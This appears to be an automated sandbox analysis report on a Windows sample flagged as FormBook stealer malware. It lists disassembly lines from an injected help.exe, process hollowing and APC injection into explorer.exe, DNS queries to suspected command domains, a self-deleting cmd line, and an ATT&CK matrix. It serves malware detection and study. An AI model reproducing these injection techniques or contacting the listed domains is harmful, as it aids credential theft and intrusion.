          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9100 mov eax, dword ptr fs:[00000030h]11_2_02AF9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF9100 mov eax, dword ptr fs:[00000030h]11_2_02AF9100
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFC962 mov eax, dword ptr fs:[00000030h]11_2_02AFC962
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFB171 mov eax, dword ptr fs:[00000030h]11_2_02AFB171
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFB171 mov eax, dword ptr fs:[00000030h]11_2_02AFB171
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1B944 mov eax, dword ptr fs:[00000030h]11_2_02B1B944
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1B944 mov eax, dword ptr fs:[00000030h]11_2_02B1B944
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B746A7 mov eax, dword ptr fs:[00000030h]11_2_02B746A7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC0EA5 mov eax, dword ptr fs:[00000030h]11_2_02BC0EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC0EA5 mov eax, dword ptr fs:[00000030h]11_2_02BC0EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC0EA5 mov eax, dword ptr fs:[00000030h]11_2_02BC0EA5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8FE87 mov eax, dword ptr fs:[00000030h]11_2_02B8FE87
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B216E0 mov ecx, dword ptr fs:[00000030h]11_2_02B216E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B076E2 mov eax, dword ptr fs:[00000030h]11_2_02B076E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC8ED6 mov eax, dword ptr fs:[00000030h]11_2_02BC8ED6
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B38EC7 mov eax, dword ptr fs:[00000030h]11_2_02B38EC7
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BAFEC0 mov eax, dword ptr fs:[00000030h]11_2_02BAFEC0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B236CC mov eax, dword ptr fs:[00000030h]11_2_02B236CC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BAFE3F mov eax, dword ptr fs:[00000030h]11_2_02BAFE3F
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFE620 mov eax, dword ptr fs:[00000030h]11_2_02AFE620
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2A61C mov eax, dword ptr fs:[00000030h]11_2_02B2A61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2A61C mov eax, dword ptr fs:[00000030h]11_2_02B2A61C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFC600 mov eax, dword ptr fs:[00000030h]11_2_02AFC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFC600 mov eax, dword ptr fs:[00000030h]11_2_02AFC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFC600 mov eax, dword ptr fs:[00000030h]11_2_02AFC600
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B28E00 mov eax, dword ptr fs:[00000030h]11_2_02B28E00
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1608 mov eax, dword ptr fs:[00000030h]11_2_02BB1608
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1AE73 mov eax, dword ptr fs:[00000030h]11_2_02B1AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1AE73 mov eax, dword ptr fs:[00000030h]11_2_02B1AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1AE73 mov eax, dword ptr fs:[00000030h]11_2_02B1AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1AE73 mov eax, dword ptr fs:[00000030h]11_2_02B1AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1AE73 mov eax, dword ptr fs:[00000030h]11_2_02B1AE73
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0766D mov eax, dword ptr fs:[00000030h]11_2_02B0766D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B07E41 mov eax, dword ptr fs:[00000030h]11_2_02B07E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B07E41 mov eax, dword ptr fs:[00000030h]11_2_02B07E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B07E41 mov eax, dword ptr fs:[00000030h]11_2_02B07E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B07E41 mov eax, dword ptr fs:[00000030h]11_2_02B07E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B07E41 mov eax, dword ptr fs:[00000030h]11_2_02B07E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B07E41 mov eax, dword ptr fs:[00000030h]11_2_02B07E41
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBAE44 mov eax, dword ptr fs:[00000030h]11_2_02BBAE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBAE44 mov eax, dword ptr fs:[00000030h]11_2_02BBAE44
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B77794 mov eax, dword ptr fs:[00000030h]11_2_02B77794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B77794 mov eax, dword ptr fs:[00000030h]11_2_02B77794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B77794 mov eax, dword ptr fs:[00000030h]11_2_02B77794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B08794 mov eax, dword ptr fs:[00000030h]11_2_02B08794
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B337F5 mov eax, dword ptr fs:[00000030h]11_2_02B337F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF4F2E mov eax, dword ptr fs:[00000030h]11_2_02AF4F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF4F2E mov eax, dword ptr fs:[00000030h]11_2_02AF4F2E
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2E730 mov eax, dword ptr fs:[00000030h]11_2_02B2E730
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1F716 mov eax, dword ptr fs:[00000030h]11_2_02B1F716
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8FF10 mov eax, dword ptr fs:[00000030h]11_2_02B8FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8FF10 mov eax, dword ptr fs:[00000030h]11_2_02B8FF10
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC070D mov eax, dword ptr fs:[00000030h]11_2_02BC070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC070D mov eax, dword ptr fs:[00000030h]11_2_02BC070D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2A70E mov eax, dword ptr fs:[00000030h]11_2_02B2A70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2A70E mov eax, dword ptr fs:[00000030h]11_2_02B2A70E
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0FF60 mov eax, dword ptr fs:[00000030h]11_2_02B0FF60
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC8F6A mov eax, dword ptr fs:[00000030h]11_2_02BC8F6A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0EF40 mov eax, dword ptr fs:[00000030h]11_2_02B0EF40
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0849B mov eax, dword ptr fs:[00000030h]11_2_02B0849B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB14FB mov eax, dword ptr fs:[00000030h]11_2_02BB14FB
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76CF0 mov eax, dword ptr fs:[00000030h]11_2_02B76CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76CF0 mov eax, dword ptr fs:[00000030h]11_2_02B76CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76CF0 mov eax, dword ptr fs:[00000030h]11_2_02B76CF0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC8CD6 mov eax, dword ptr fs:[00000030h]11_2_02BC8CD6
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2BC2C mov eax, dword ptr fs:[00000030h]11_2_02B2BC2C
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC740D mov eax, dword ptr fs:[00000030h]11_2_02BC740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC740D mov eax, dword ptr fs:[00000030h]11_2_02BC740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC740D mov eax, dword ptr fs:[00000030h]11_2_02BC740D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BB1C06 mov eax, dword ptr fs:[00000030h]11_2_02BB1C06
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76C0A mov eax, dword ptr fs:[00000030h]11_2_02B76C0A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1746D mov eax, dword ptr fs:[00000030h]11_2_02B1746D
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8C450 mov eax, dword ptr fs:[00000030h]11_2_02B8C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B8C450 mov eax, dword ptr fs:[00000030h]11_2_02B8C450
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2A44B mov eax, dword ptr fs:[00000030h]11_2_02B2A44B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B21DB5 mov eax, dword ptr fs:[00000030h]11_2_02B21DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B21DB5 mov eax, dword ptr fs:[00000030h]11_2_02B21DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B21DB5 mov eax, dword ptr fs:[00000030h]11_2_02B21DB5
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC05AC mov eax, dword ptr fs:[00000030h]11_2_02BC05AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC05AC mov eax, dword ptr fs:[00000030h]11_2_02BC05AC
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B235A1 mov eax, dword ptr fs:[00000030h]11_2_02B235A1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AF2D8A mov eax, dword ptr fs:[00000030h]11_2_02AF2D8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2FD9B mov eax, dword ptr fs:[00000030h]11_2_02B2FD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B2FD9B mov eax, dword ptr fs:[00000030h]11_2_02B2FD9B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B22581 mov eax, dword ptr fs:[00000030h]11_2_02B22581
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BA8DF1 mov eax, dword ptr fs:[00000030h]11_2_02BA8DF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0D5E0 mov eax, dword ptr fs:[00000030h]11_2_02B0D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B0D5E0 mov eax, dword ptr fs:[00000030h]11_2_02B0D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBFDE2 mov eax, dword ptr fs:[00000030h]11_2_02BBFDE2
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov ecx, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B76DC9 mov eax, dword ptr fs:[00000030h]11_2_02B76DC9
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B7A537 mov eax, dword ptr fs:[00000030h]11_2_02B7A537
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BBE539 mov eax, dword ptr fs:[00000030h]11_2_02BBE539
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B03D34 mov eax, dword ptr fs:[00000030h]11_2_02B03D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BC8D34 mov eax, dword ptr fs:[00000030h]11_2_02BC8D34
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24D3B mov eax, dword ptr fs:[00000030h]11_2_02B24D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24D3B mov eax, dword ptr fs:[00000030h]11_2_02B24D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B24D3B mov eax, dword ptr fs:[00000030h]11_2_02B24D3B
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02AFAD30 mov eax, dword ptr fs:[00000030h]11_2_02AFAD30
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1C577 mov eax, dword ptr fs:[00000030h]11_2_02B1C577
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B1C577 mov eax, dword ptr fs:[00000030h]11_2_02B1C577
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B17D50 mov eax, dword ptr fs:[00000030h]11_2_02B17D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B33D43 mov eax, dword ptr fs:[00000030h]11_2_02B33D43
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02B73540 mov eax, dword ptr fs:[00000030h]11_2_02B73540
          Source: C:\Windows\SysWOW64\help.exeCode function: 11_2_02BA3D40 mov eax, dword ptr fs:[00000030h]11_2_02BA3D40
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeCode function: 4_2_0040ACC0 LdrLoadDll,4_2_0040ACC0
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.usauber.com
          Source: C:\Windows\explorer.exeDomain query: www.vrchance.com
          Source: C:\Windows\explorer.exeDomain query: www.sunnytheodora.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeSection unmapped: C:\Windows\SysWOW64\help.exe base address: AC0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeSection loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeMemory written: C:\Users\user\Desktop\VJaX7U6LAp.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exeJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeProcess created: C:\Users\user\Desktop\VJaX7U6LAp.exe C:\Users\user\Desktop\VJaX7U6LAp.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.389356128.0000000004F80000.00000004.00000001.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.399710290.00000000008B8000.00000004.00000020.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.400222280.0000000000EE0000.00000002.00020000.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000006.00000000.400222280.0000000000EE0000.00000002.00020000.sdmp, help.exe, 0000000B.00000002.622677188.0000000004000000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeQueries volume information: C:\Users\user\Desktop\VJaX7U6LAp.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Process Discovery2Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
